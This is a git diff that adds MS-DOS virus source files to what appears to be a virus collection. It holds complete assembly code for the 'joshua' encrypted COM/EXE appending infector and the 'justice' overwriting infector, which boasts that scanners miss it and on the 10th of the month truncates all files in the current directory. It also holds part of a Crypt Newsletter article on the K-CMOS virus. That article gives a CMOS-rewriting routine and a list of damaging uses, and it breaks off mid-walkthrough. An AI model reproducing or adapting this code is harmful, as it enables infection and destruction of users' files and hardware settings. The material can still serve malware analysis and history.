b/MSDOS/Virus.MSDOS.Unknown.joshua.asm @@ -0,0 +1,484 @@ +;****************************************************************** +;* * +;* My First Virus, a simple non-overwriting COM and EXE * +;* infector. * +;* by, Joshua * +;* * +;****************************************************************** + +ID = 'SS' ; My ID + + .model tiny ; Memory model + .code ; Start Code + org 100h ; Start of COM file + +MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS + +START proc near + +DECRYPT: mov bx,offset START_VIRUS ; Find out our offset + mov cx,(END_VIRUS-START_VIRUS)/2 +DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx +KEY dw 0 ; Crypt KEY + add bx,2 ; Increment offset + dec cx ; Decrement counter + jnz DECRYPT_LOOP ; Continue until done + +START_VIRUS: + call FIND_OFFSET ; Real start of virus + +; Calculate change in offset from host program. + +FIND_OFFSET: pop bp ; BP holds current IP + sub bp, offset FIND_OFFSET ; Calculate net change + ; Change BP to start of + ; virus code + +; Capture INT 24h Critical error handler. + + push es ; Save ES + mov ax,3524h ; DOS get interupt vector + int 21h ; Call DOS to do it + mov word ptr [bp+OLDINT24],bx ; Save old INT 24h + mov word ptr [bp+OLDINT24+2],es ; vector + mov ah,25h ; DOS set interupt vector + lea dx,[bp+NEWINT24] ; Address of new interupt + int 21h ; Call DOS to do it + pop es ; Restore ES + +; Find out what kind of program I am, COM or EXE, by checking stack pointer. +; This is where I store my ID in an EXE infection. + + cmp sp,ID ; COM or EXE? + je RESTORE_EXE ; I am an EXE file + +; Restore original bytes to the COM program. + +RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes + mov di,100h ; to 100h, start of file + push di ; Jmp to 100h when done + movsw ; Copy 3 bytes + movsb + jmp short RESTORE_DONE + +; Restore original bytes to the EXE program. + +RESTORE_EXE: push ds ; Save original DS + push es ; Save original ES + push cs ; Set DS = CS + pop ds + push cs ; Set ES = CS + pop es + lea si,[bp+JMPSAVE] ; Copy original CS:IP and + lea di,[bp+JMPSAVE2] ; SS:SP for return + movsw ; Copy 8 bytes + movsw + movsw + movsw + +; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy +; original command line parameters. + +RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area + mov ah,1ah ; DOS set DTA + int 21h ; Call DOS to do it + +; Save original directory. + + mov ah,47h ; DOS get current directory + lea si,[bp+ORIG_DIR] ; Store it here + mov dl,0 ; Current drive + int 21h ; Call DOS to do it + +; Search for a file to infect. + +SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file + call FINDFIRST ; Begin search + lea dx,[bp+COM_MASK] ; Search for any COM file + call FINDFIRST ; Begin search + + mov ah,3bh ; DOS change directory + lea dx,[bp+DOTDOT] ; Go up one direcotry + int 21h ; Call DOS to do it + jnc SEARCH ; Go look for more files + +; Restore default DTA, original directory, and pass control back to +; original program. + +QUIT: mov ah,3bh ; DOS change directory + lea dx,[bp+ORIG_DIR-1] ; Point to original directory + int 21h ; Call DOS to do it + push ds ; Save DS + mov ax,2524h ; DOS set interupt vector + lds dx,[bp+OLDINT24] ; Restore INT 24h + int 21h ; Call DOS to do it + pop ds ; Restore DS + mov ah,1ah ; DOS set DTA + mov dx,80h ; Restore original DTA + cmp sp,ID-4 ; EXE or COM? ES,DS on stack + jz QUIT_EXE ; Pass control to host EXE + +QUIT_COM: int 21h ; Call DOS to set DTA + retn ; Remember, 100h was on stack + +QUIT_EXE: pop es ; Restore original ES + pop ds ; Restore original DS + int 21h ; Call DOS to set DTA + mov ax,es ; AX = begin of PSP segment + add ax,16 ; Add size of PSP to get CS + add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP + add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS + cli ; Clear interrupts + mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP + mov ss,ax ; Restore SS + sti ; Set interrupts + db 0eah ; Jump SSSS:OOOO + +JMPSAVE2 dd ? ; CS:IP for EXE return +STACKSAVE2 dd ? ; SS:SP for EXE return +JMPSAVE dd ? ; Original EXE CS:IP +STACKSAVE dd ? ; Original EXE SS:SP + +CREATOR db '[Joshua]' ; That's me! + +; DOS Findfirst / Findnext services + +FINDFIRST: mov ah,4eh ; DOS find first service + mov cx,7 ; Choose files w/ any attribute +FINDNEXT: int 21h ; Call DOS to do it + jc END_SEARCH ; Quit if there are errors + ; or no more files + +; Ok, if I am here, then I found a possible victim. First open the file +; for read only. + + mov al,0 ; DOS Open file, read only + call OPEN ; Open the file + +; Read in the beginning bytes to check for previous infection and then close. + + mov ah,3fh ; DOS Read file + lea dx,[bp+BUFFER] ; Save the original header + mov cx,24 ; Read 24 bytes + int 21h ; Call DOS to do it + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Check if the file is an EXE. + +CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE? + jne CHECK_COM ; Nope, see if it's a COM + cmp word ptr [bp+BUFFER+16],ID; Is it already infected? + je ANOTHER ; Yep, so try another + jmp short INFECT_EXE ; We got one! Go infect it! + + +; Check if the file is COMMAND.COM + +CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM + jz ANOTHER ; If it is, try another file + +; Now, check for previous infection by checking for our presence at +; the end of the file. + + mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX + cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big + jle ANOTHER ; If so, try another + mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX + add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset + cmp ax,cx ; Compare file size's + jnz INFECT_COM ; If healthy, go infect it + +ANOTHER: mov ah,4fh ; Otherwise find another + jmp short FINDNEXT ; possible victim + +END_SEARCH: retn ; No files found + +;*** Subroutine INFECT_COM *** + +INFECT_COM: + +; Save the first three bytes of the COM file + + lea si,[bp+BUFFER] ; Start of first 3 bytes + lea di,[bp+COM_START] ; Store them here + movsw ; Transfer the 3 bytes + movsb + +; Calculate jump offset for header of victim so it will run virus first. +; AX has the filesize. Store new JMP and OFFSET in the buffer. + + mov cx,3 ; No. bytes to write in header + sub ax,cx ; Filesize - jmp_offset + mov byte ptr [si-3],0e9h ; Store new JMP command + mov word ptr [si-2],ax ; plus offset + add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET + push ax ; Save it for later + jmp DONE_INFECTION ; We're done! + +;*** Subroutine INFECT_EXE *** + +INFECT_EXE: + +; Save original CS:IP and SS:SP. + + les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP + mov word ptr [bp+JMPSAVE],ax ; Store IP + mov word ptr [bp+JMPSAVE+2],es ; Store CS + les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP + mov word ptr [bp+STACKSAVE],es ; Store SP + mov word ptr [bp+STACKSAVE+2],ax ; Store SS + +; Get get the header size in bytes. + + mov ax,word ptr [bp+BUFFER+8] ; Get header size + mov cl,4 ; Convert paragraphs to bytes + shl ax,cl ; Multiply by 16 + xchg ax,bx ; Put header size in BX + +; Get file size. + + les ax,[bp+offset DTA+26] ; Get filesize to + mov dx,es ; DX:AX format + + push ax ; Save filesize + push dx + + sub ax,bx ; Subtract header size + sbb dx,0 ; from filesize + + mov cx,16 ; Convert to SEGMENT:OFFSET + div cx ; form + +; Store new entry point (CS:IP) in header. + + mov word ptr [bp+BUFFER+20],dx; Store IP + mov word ptr [bp+BUFFER+22],ax; Store CS + + add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset + mov bx,dx ; Hold it for now + +; Store new stack frame (SS:SP) in header. + + mov word ptr [bp+BUFFER+14],ax; Store SS + mov word ptr [bp+BUFFER+16],ID; Store SP + + pop dx ; Get back filesize + pop ax + + add ax,END_VIRUS-START_VIRUS ; Add virus size + adc dx,0 ; to filesize + + push ax ; Save AX + mov cl,9 ; Divide AX + shr ax,cl ; by 512 + ror dx,cl + stc ; Set carry flag + adc dx,ax ; Add with carry + pop ax ; Get back AX + and ah,1 ; Mod 512 + +; Store new filesize in header. + + mov word ptr [bp+BUFFER+4],dx ; Store new filesize + mov word ptr [bp+BUFFER+2],ax + + push cs ; Restore ES + pop es + mov cx,24 ; No. bytes to write in header + + push bx ; Save START_VIRUS offset + +; Write virus to victim and restore the file's original timestamp, datestamp, +; and attributes. These values were stored in the DTA by the +; Findfirst / Findnext services. + +DONE_INFECTION: + push cx ; Save no. bytes to write + xor cx,cx ; Clear attributes + call SET_ATTR ; Set attributes + + mov al,2 ; DOS open file for read/write + call OPEN ; Open the file + +; Write the new header at the beginning of the file. + + mov ah,40h ; DOS write to file + pop cx ; Number of bytes to write + lea dx,[bp+BUFFER] ; Point to the bytes to write + int 21h ; Call DOS to do it + +; Move to end of file. + + mov ax,4202h ; DOS set read/write pointer + xor cx,cx ; Set offset move to zero + cwd ; Equivalent to xor dx,dx + int 21h ; Call DOS to do it + +; Append virus to end of file. + + mov ah,2ch ; DOS get time + int 21h ; Call DOS to do it + mov [bp+KEY],dx ; Save sec + 1/100 sec + ; as the new KEY + + lea di,[bp+APPEND] ; to the heap + mov cx,START_VIRUS-DECRYPT ; Number of bytes to move + mov al,53h ; Push BX and store it + stosb ; in the append routine + lea si,[bp+DECRYPT] ; Move Crypt routines + push si ; Save SI + push cx ; Save CX + rep movsb ; Transfer the data + + lea si,[bp+WRITE_START] ; Now copy the write + mov cx,WRITE_END-WRITE_START ; routine to the heap + rep movsb ; Transfer the data + + pop cx ; Get back + pop si ; CX and SI + rep movsb ; Recopy Crypt routine + + mov ax,0c35bh ; Tack a POP BX and + stosw ; RETN on the end + + pop ax ; New START_VIRUS offset + mov word ptr [bp+DECRYPT+1],ax; Store new offset + + call APPEND ; Write the file + +; Restore original creation date and time. + + mov ax,5701h ; DOS set file date & time + mov cx,word ptr [bp+DTA+22] ; Set time + mov dx,word ptr [bp+DTA+24] ; Set date + int 21h ; Call DOS to do it + +; Close the file. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Restore original file attributes. + + mov cx,word ptr [bp+DTA+21] ; Get original file attribute + call SET_ATTR ; Set attribute + + pop bx ; Take CALL off stack + + +; ****** B O M B S E C T I O N ****** + +; Check to see if the virus is ready to activate. +; Put all activation tests and bombs here. + +CONDITIONS: ; mov ah,2ah ; DOS get date + ; int 21h ; Call DOS to do it + ; cmp dx,1001h ; Check for Oct 1st + ; jl BOMB_DONE ; Not time yet + ; mov ah,2ch ; DOS get time + ; int 21h ; Call DOS to do it + ; cmp cl,25h ; Check for 25 min past + ; jl BOMB_DONE ; Not time yet + +BOMB: mov ah,3h ; BIOS find cursor position + mov bh,0 ; Video page 0 + int 10h ; Call BIOS to do it + push dx ; Save original Row and Column + mov cx,6 ; Number of lines to print + lea si,[bp+VERSE] ; Location of VERSE + mov dx,080ah ; Row and Column of output +PRINTLOOP: mov ah,2h ; BIOS set cursor + int 10h ; Set cursor + push dx ; Save Row and Column + mov ah,9h ; DOS print string + mov dx,si ; Location of VERSE + int 21h ; Call DOS to print it + pop dx ; Get Row and Column + inc dh ; Increment Row + add si,54 ; Go to next line of VERSE + loop PRINTLOOP ; Print all lines + + mov ah,00h ; Read character from keybd + int 16h + + pop dx ; Get original Row Column + mov ah,2h ; BIOS set cursor + int 10h ; Call BIOS to do it + +BOMB_DONE: jmp QUIT ; Go back to host program + +VERSE: db 'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·$' + db 'º Guess what ??? º$' + db 'º You have been victimized by a virus!!! Do not º$' + db 'º try to reboot your computer or even turn it º$' + db 'º off. You might as well read this and weep! º$' + db 'ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ',7,7,'$' + +; Write routine to append the virus to the end of the file. + +WRITE_START: + pop bx ; Get back file handle + push bx ; Save it again + mov ah,40h ; DOS write to file + mov cx,END_VIRUS-DECRYPT ; Length of virus + lea dx,[bp+DECRYPT] ; Start from beginning of virus + int 21h ; Call DOS to do it +WRITE_END: + + +; New INT 24h handler. + +NEWINT24: mov al,3 ; Fail call + iret ; Return + + +;*** Subroutine OPEN *** +; Open a file. Takes AL as parameter. + +OPEN proc near + mov ah,3dh ; DOS open file, read/write + lea dx,[bp+DTA+30] ; Point to filename we found + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + retn ; Return +OPEN endp + +;*** Subroutine SET_ATTR *** +; Takes CX as a parameter + +SET_ATTR proc near + mov ax,4301h ; DOS change file attr + lea dx,[bp+DTA+30] ; Point to file name + int 21h ; Call DOS + retn ; Return +SET_ATTR endp + + +; This area will hold all variables to be encrypted + +COM_MASK db '*.com',0 ; COM file mask +EXE_MASK db '*.exe',0 ; EXE file mask +DOTDOT db '..',0 ; Go up one directory +COM_START db 0cdh,20h,0 ; Header for infected file +BACKSLASH db '\' ; Backslash for directory + +START endp + +END_VIRUS equ $ ; Mark end of virus code + +; This data area is a scratch area and is not included in virus code. + +ORIG_DIR db 64 dup(?) ; Holds original directory + +OLDINT24 dd ? ; Storage for old INT 24 vector + +BUFFER db 24 dup(?) ; Read buffer and EXE header + +DTA db 43 dup(?) ; New DTA location + +APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?) + +ENDHEAP: + + end MAIN diff --git a/MSDOS/Virus.MSDOS.Unknown.justice.asm b/MSDOS/Virus.MSDOS.Unknown.justice.asm new file mode 100644 index 00000000..2c33b240 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.justice.asm @@ -0,0 +1,335 @@ +; Virusname: ...and justice for all +; Country : Sweden +; Author : Metal Militia / Immortal Riot +; Date : 07-29-1993 + +; This is an mutation of 808 virus by Skism in USA. +; Many thanks to the scratch coder of the 808 virus. + +; We've tried this virus ourself, and it works just fine. +; Infects one random EXE-file every run, by overwriting it +; with the virus-code, and if the file is smaller, will "pad" +; it out to the size of the virus anyhow. +; +; McAfee Scan v105 can't find it, and +; S&S Toolkit 6.5 don't find it either. + +; I haven't tried with scanners like Fprot/Tbscan, +; but they will probably report some virus structure. +; +; Best Regards : [Metal Militia] +; [The Unforgiven] + + +filename EQU 30 ;used to find file name +fileattr EQU 21 ;used to find file attributes +filedate EQU 24 ;used to find file date +filetime EQU 22 ;used to find file time + + + +code_start EQU 0100h ;start of all .COM files +virus_size EQU 808 ;TR 808 + + +code segment 'code' +assume cs:code,ds:code,es:code + org code_start + +main proc near + +jmp virus_start + +encrypt_val db 00h + +virus_start: + + call encrypt ;encrypt/decrypt file + jmp virus ;go to start of code + +encrypt: + + push ax + mov bx,offset virus_code ;start encryption at data + +xor_loop: + + mov ch,[bx] ;read current byte + xor cl,encrypt_val ;get encryption key + mov [bx],ch ;switch bytes + inc bx ;move bx up a byte + cmp bx,offset virus_code+virus_size + ;are we done with the encryption + jle xor_loop ;no? keep going + pop cx + ret + + +infectfile: + + mov dx,code_start ;where virus starts in memory + mov bx,handle ;load bx with handle + push bx ;save handle on stack + call encrypt ;encrypt file + pop bx ;get back bx + mov cx,virus_size ;number of bytes to write + mov ah,40h ;write to file + int 21h ; + push bx + call encrypt ;fix up the mess + pop bx + ret + +virus_code: + +wildcards db "*",0 ;search for directory argument +filespec db "*.EXE",0 ;search for EXE file argument +filespec2 db "*.*",0 ;search fro all files argument +rootdir db "\",0 ;argument for root directory +dirdata db 43 dup (?) ;holds directory DTA +filedata db 43 dup (?) ;holds files DTA +diskdtaseg dw ? ;holds disk dta segment +diskdtaofs dw ? ;holds disk dta offset +tempofs dw ? ;holds offset +tempseg dw ? ;holds segment +drivecode db ? ;holds drive code +currentdir db 64 dup (?) ;save current directory into this +handle dw ? ;holds file handle +orig_time dw ? ;holds file time +orig_date dw ? ;holds file date +orig_attr dw ? ;holds file attr +idbuffer dw 2 dup (?) ;holds virus id + +virus: + + mov ax,3000h ;get dos version + int 21h ; + cmp al,02h ;is it at least 2.00? + jb bus1 ;won't infect less than 2.00 + mov ah,2ch ;get time + int 21h ; + mov encrypt_val,dl ;save m_seconds to encrypt val so + ;theres 100 mutations possible +setdta: + + mov dx,offset dirdata ;offset of where to hold new dta + mov ah,1ah ;set dta address + int 21h ; + +newdir: + + mov ah,19h ;get drive code + int 21h ; + mov dl,al ;save drivecode + inc dl ;add one to dl, because functions differ + mov ah,47h ;get current directory + mov si, offset currentdir ;buffer to save directory in + int 21h ; + + mov dx,offset rootdir ;move dx to change to root directory + mov ah,3bh ;change directory to root + int 21h ; + +scandirs: + + mov cx,13h ;include hidden/ro directorys + mov dx, offset wildcards ;look for '*' + mov ah,4eh ;find first file + int 21h ; + cmp ax,12h ;no first file? + jne dirloop ;no dirs found? bail out + +bus1: + + jmp bus + +dirloop: + + mov ah,4fh ;find next file + int 21h ; + cmp ax,12h + je bus ;no more dirs found, roll out + +chdir: + + mov dx,offset dirdata+filename;point dx to fcb - filename + mov ah,3bh ;change directory + int 21h ; + + mov ah,2fh ;get current dta address + int 21h ; + mov [diskdtaseg],es ;save old segment + mov [diskdtaofs],bx ;save old offset + mov dx,offset filedata ;offset of where to hold new dta + mov ah,1ah ;set dta address + int 21h ; + +scandir: + + mov cx,07h ;find any attribute + mov dx,offset filespec ;point dx to "*.COM",0 + mov ah,4eh ;find first file function + int 21h ; + cmp ax,12h ;was file found? + jne transform + +nextexe: + + mov ah,4fh ;find next file + int 21h ; + cmp ax,12h ;none found + jne transform ;found see what we can do + + mov dx,offset rootdir ;move dx to change to root directory + mov ah,3bh ;change directory to root + int 21h ; + mov ah,1ah ;set dta address + mov ds,[diskdtaseg] ;restore old segment + mov dx,[diskdtaofs] ;restore old offset + int 21h ; + jmp dirloop + + +bus: + + jmp rollout + +transform: + + mov ah,2fh ;temporally store dta + int 21h ; + mov [tempseg],es ;save old segment + mov [tempofs],bx ;save old offset + mov dx, offset filedata + filename + + mov bx,offset filedata ;save file... + mov ax,[bx]+filedate ;date + mov orig_date,ax ; + mov ax,[bx]+filetime ;time + mov orig_time,ax ; and + mov ax,[bx]+fileattr ; + mov ax,4300h + int 21h + mov orig_attr,cx + mov ax,4301h ;change attributes + xor cx,cx ;clear attributes + int 21h ; + mov ax,3d00h ;open file - read + int 21h ; + jc fixup ;error - find another file + mov handle,ax ;save handle + mov ah,3fh ;read from file + mov bx,handle ;move handle to bx + mov cx,02h ;read 2 bytes + mov dx,offset idbuffer ;save to buffer + int 21h ; + + mov ah,3eh ;close file for now + mov bx,handle ;load bx with handle + int 21h ; + + mov bx, idbuffer ;fill bx with id string + cmp bx,02ebh ;infected? + jne doit ;same - find another file + + +fixup: + mov ah,1ah ;set dta address + mov ds,[tempseg] ;restore old segment + mov dx,[tempofs] ;restore old offset + int 21h ; + jmp nextexe + + +doit: + + mov dx, offset filedata + filename + mov ax,3d02h ;open file read/write access + int 21h ; + mov handle,ax ;save handle + + call infectfile + + ;mov ax,3eh ;close file + ;int 21h + +rollout: + + mov ax,5701h ;restore original + mov bx,handle ; + mov cx,orig_time ;time and + mov dx,orig_date ;date + int 21h ; + + mov ax,4301h ;restore original attributes + mov cx,orig_attr + mov dx,offset filedata + filename + int 21h + ;mov bx,handle + ;mov ax,3eh ;close file + ;int 21h + mov ah,3bh ;try to fix this + mov dx,offset rootdir ;for speed + int 21h ; + mov ah,3bh ;change directory + mov dx,offset currentdir ;back to original + int 21h ; + mov ah,2ah ;check system date + int 21h ; + cmp cx,1993 ;is it at least 1993? + jb audi ;no? don't do it now + cmp dl,10 ;is it the 10th? + jne audi ;not yet? quit + mov dx,offset dirdata ;offset of where to hold new dta + mov ah,1ah ;set dta address + int 21h ; + mov ah,4eh ;find first file + mov cx,7h ; + mov dx,offset filespec2 ;offset *.* + +Loops: + + int 21h ; + jc audi ;error? then quit + mov ax,4301h ;find all normal files + xor cx,cx ; + int 21h ; + mov dx,offset dirdata + filename + mov ah,3ch ;fuck up all files in current dir + int 21h ; + jc audi ;error? quit + mov ah,4fh ;find next file + jmp loops ; + +audi: + + mov ax,4c00h ;end program + int 21h ; + +; Time changes, and so does the text..sorry Skism :) +; but hey! Isn't this message much fanicer then the old ? +; Yeah, right, Metal Up Your Ass! + +words_ db " Metal Militia / Immortal Riot",0 + +words2 db " ...and Justice for all",0 + +words3 db " Justice is lost",0 + db " Justice is raped",0 + db " Justice is gone",0 + db " Pulling your strings",0 + db " Seeking no truth",0 + db " Winning is all",0 + db " Find it so Grim",0 + db " so true",0 + db " so real",0 + +; heh..what a lucky dog I'm, the new virus turned out to be 808 bytes, +; which means exactly like the old one..(used tlink2 /t). + +main endp +code ends + end main + + +  \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.k-cmos.asm b/MSDOS/Virus.MSDOS.Unknown.k-cmos.asm new file mode 100644 index 00000000..208efb6a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.k-cmos.asm @@ -0,0 +1,1118 @@ +comment $ + + K-CM”S VIRUS for Crypt Newsletter 20 + + + In my quest to bring the latest hi-tech computer virus + toys to you, faithful reader, I have researched one of the + relatively untouched-by-viruses parts of an AT computer: + the CMOS. + + The CMOS (Complementary Metal Oxide Semiconductor) is a + low power consumption semiconductor where information such as + the current equipment settings, hard drive type, time and + date is stored and maintained using a NiCad battery that is + recharged every time you turn on the computer. (That is why + it's a good idea to turn on the computer every once in a while + if you are not using it for long periods. This prevents + battery discharge and loss of CMOS settings.) + + The CMOS in your computer is changed and set every time + you run the Setup program that comes with your BIOS (AMI, + Phoenix), and can be accessed and changed by any program + running from DOS. + + The AT CMOS RAM is divided into three areas: + + 1 - The clock/calendar bytes + 2 - The control registers + 3 - General purpose RAM. + + The following table describes the CMOS RAM location and what + each byte is used for: + +OFFSET byte DESCRIPTION + +Real Clock Data + +00 Current second in BCD +01 Alarm second in BCD +02 Current minute in BCD +03 Alarm minute in BCD +04 Current Hour in BCD +05 Alarm Hour in BCD +06 Current day of week in BCD +07 Current day in BCD +08 Current month in BCD +09 Current year in BCD + +Status Registers + +0A Status Register A +0B Status Register B +0C Status Register C +0D Status Register D + +Configuration Data + +0E Diagnostic Status + Bit 7 - Clock Lost Power + Bit 6 - Bad CMOS checksum + Bit 5 - invalid config info at POST + Bit 4 - memory Size compare error at POST + Bit 3 - Fixed disk or adapter failed initialization + Bit 2 - Invalid CMOS time + Bits 1-0 - Reserved +0F Reason for Shutdown + 00 - Power on or reset + 01 - Memory Size pass + 02 - Memory test pass + 03 - memory test fail + 04 - POST end: boot system + 05 - jmp doubleword pointer with EOI + 06 - Protected tests pass + 07 - Protected tests fail + 08 - Memory size fail + 09 - INT 15h Block move + 0A - JMP double word pointer without EOI +10 Diskette Drive Types + Bits 7-4 - Diskette drive 0 type + Bits 3-0 - Diskette drive 1 type + 0000b - no drive + 0001b - 360K drive + 0010b - 1.2MB drive + 0011b - 720K drive + 0100b - 1.44 MB drive + 0101b - 2.88 MB drive +11 Reserved +12 Fixed Disk Drive Types + Bits 7-4 - Fixed Disk drive 0 type + Bits 3-0 - Fixed Disk drive 1 type + 0000b - no drive + (Note: These drives do not necessarily + correspond with the values stored at + locations 19h and 1Ah) +13 Reserved +14 Equipment Installed + Bits 7-6 - # of Diskette drives + 00b - 1 diskette drive + 01b - 2 diskette drives + Bits 5-4 - Primary Display + 00b - reserved + 01b - 40 X 25 color + 10b - 80 X 25 color + 11b - 80 X 25 monochrome + Bits 3-0 - Reserved +15 Base Memory in 1K low byte +16 Base Memory in 1K high byte +17 Expansion Memory size low byte +18 Expansion Memory size high byte +19 Fixed Disk Drive Type 0 +1A Fixed Disk Drive Type 1 +1B-2D Reserved +2E Configuration Data checksum high byte +2F Configuration Data checksum low byte +30 Actual Expansion Memory size low byte +31 Actual Expansion Memory size high byte +32 Century in BCD +33 Information Flag + Bit 7 - 128 Kbyte expanded + Bit 6 - Setup Flag + Bits 5-0 - Reserved +34-3F Reserved + + + + As you can see, there are a total of 63 (3F hex) bytes of + CMOS RAM, with 33 bytes used as 'reserved' memory in the + three areas; these locations are not currently defined by + the AT BIOS and might be used to store data that will be + restored after power is shut down. + + The 4 status registers (A through D) located, appropriately, at + locations 0Ah through 0Dh define the chips operating + parameters and provide information about interrupts and the + state of the real time clock chip (RTC). + + With very few restrictions all CMOS RAM locations may be + directly accessed by an application. + + Program locations 11h, 13h, and 1Bh through 2Dh are used + in calculating the CMOS checksum that the BIOS stores at + locations 2Eh and 2Fh. + + Note: If a program changes ANY bytes at locations 10h + through 2Dh it must also recalculate the checksum and store + the new value. Changing these bytes (10h -> 2Dh) without + correcting the checksum results in a 'CMOS checksum error' + forcing you to run the BIOS setup and reenter all of the CMOS + information. + + The reserved memory locations 34h through 3Fh are not used in + checksum calculations and may be changed with extreme caution + since different BIOS versions, manufacturers and hardware + configurations use this reserved CMOS RAM locations for + extended system setup information including BIOS passwords + and DMA settings. + + + To access and change a computer's CMOS RAM is very simple: + + Access is done through ports 70 hex (CMOS control/address) + and port 71 hex (CMOS data). + + The process is thus: + + 1 - We specify the CMOS RAM address of the byte we want to + read or write using port 70h + + EXAMPLE: + + mov al,XX where XX = byte specifying the address (00h->3Fh) + out 70h,al + + 2 - We read or write a byte to the address specified in step + 1. + + READ EXAMPLE: + + in al,71h byte at location XX goes into AL + + WRITE EXAMPLE: + + out 71h,al byte in AL goes to location XX in the CMOS RAM + + There is one little problem: if we are writing to any of the + locations that are checksummed (10h through 2Dh), we must + change the checksum value as well; so we follow steps 1 and 2 + with the checksum values at locations 2Eh and 2Fh, combine + the bytes into one register and subtract the current byte + value from the register containing the checksum. Then we add + the value of the new byte to be put in the CMOS RAM to the + register that has the checksum, and we write the checksum, + and the new byte to the CMOS. + + While all of this might seem too complicated, I have + written a mini-CM”S toolkit, a routine that takes the address + and the new value of the byte to be put in the CMOS, and does + the dirty work of putting the values and of changing the + checksum for you. + + Read the code carefully. It will make everything become + clearer. + +;============================================================================== +CMOS_CHCKSM: + +; INPUT: +; DL = CMOS ADDRESS of BYTE TO be MODiFiED +; BL = NEW BYTE VALUE to be PUT IN CMOS RAM + +; OUTPUT: +; None. +; REGISTERS USED: AX,CX,BX,DX + +;************************* +; GET CMOS Checksum => CX +;************************* + + xor ax,ax + mov al,2Eh ;msb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg ch,al ;store al in ch + + mov al,2Fh ;lsb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg cl,al ;store lsb to cl + +;********************* +; Fix CMOS Checksum +;********************* + + push dx + xchg dl,al ;AL = address + out 70h,al ;send address / control byte + in al,71h ;read register + + sub cx,ax ;subtract from checksum + + add cx,bx ;update checksum value in register. + +;**************************** +; Write CMOS byte to Address +;**************************** + + pop dx + xchg dl,al ;AL = address + out 70h,al ;specify CMOS address + xchg al,bl ;new CMOS value => al + + out 71h,al ;write new CMOS byte + +;********************* +; Write CMOS Checksum +;********************* + + mov al,2Eh ;address of checksum 's msb + out 70h,al ;specify CMOS address + xchg al,ch ;msb of new checksum + + out 71h,al ;write new CMOS msb + + mov al,2Fh ;address of checksum 's lsb + out 70h,al ;specify CMOS address + xchg al,cl ;lsb of new checksum + + out 71h,al ;write new CMOS lsb + ret + +;============================================================================== + + + It is worth mentioning that for XT (8088) type computers + the CMOS routine will have no adverse effects in the + execution of the virus-infected program. + + There are many intriguing features of CMOS-attacking + viruses: The biggest one is the interaction between software + and CMOS is not stopped by common anti-virus memory + resident programs. The most talked about example of such + a virus is the South African EXEbug, which uses CMOS + manipulation to make itself difficult to remove from an + infected hard disk. EXEbug massages the CMOS so that if + the machine is booted from a diskette and the virus is + not in memory, the infected hard disk is not recognized. + + The list of possible problems created by a CMOS + attacking virus is long: + + 1 - CMOS checksum errors. + This will force the user to reenter all of the CMOS data. + Change any value in the correct CMOS range without + updating the checksum. + + 2 - Dead disk / hard drives. + This could drive the uninformed to presume they have + encountered a hardware problem. + + 3 - Changed hardrive types, horrendous hardrive problems. + For example: Input the hardrive type byte, subtract some small + digit from it and output the byte to the CMOS. (The checksum + must be fixed!) and a horrible mess results on subsequent + boot up. + + 4 - Changed dates, times, etc. + The uninformed could thing the Nicad battery has died, + or that his/her computer is possessed by evil, Nigerian + Deities. + + 5 - Changed BIOS passwords, inability to access a computer. + On newer AMI BIOSes you can set or change the password + required to access the computer. This topic was discussed + briefly in a recent issue of Virus News International, the + upshot being that the unsuspecting could be flummoxed into + throwing the computer out the window, or more realistically, + calling a technician. In the case where some knowledge about + computers is present, the case is opened and the jumper + found to short the CMOS. (No, you don't have to disconnect + the battery. And you didn't throw out your machine manuals + did you?) + + Although many anti-virus programs can save and restore + your CMOS values as part of their function, currently there + is only one memory resident program that checks for changes + in the CMOS: Thunderbyte's TBMEM. + + This month's example, K-CM”S, falls in category #2: it + kills all fixed disk drives by zeroing out location 12h in + the CMOS RAM. It also has some encryption abilities (a 16 + byte constant decryptor) and a PATH style infection routine + that actually works! + + Needless to say, careful handling is necessary as it can + spread quite rapidly. + + Important: Since K-CMOS zero's the CMOS value for the fixed + disk on execution, unless you restore the value before ending + your experiment with some software CMOS reloading tool, you + will have a dead C: drive when you finally get around to + rebooting. Keep in mind that if you don't know how to reset + your CMOS on power up using the built in BIOS setup, you will + sit there in a dumb stew wondering why you ran a virus which + unhooked your hard drive. + + To prevent this from happening, you must familiarize yourself + with the BIOS setup program. Here is a brief walkthrough which + could be used to properly restore your machine after K-CMOS + has altered your CMOS: + + 1 - BEFORE you execute K-CMOS - on power up, bring up your + BIOS setup by holding down the DEL key while you are booting + the computer. + + 2 - You will probably see a screen with a number of selections. + You will want to bring up "Change Basic CMOS 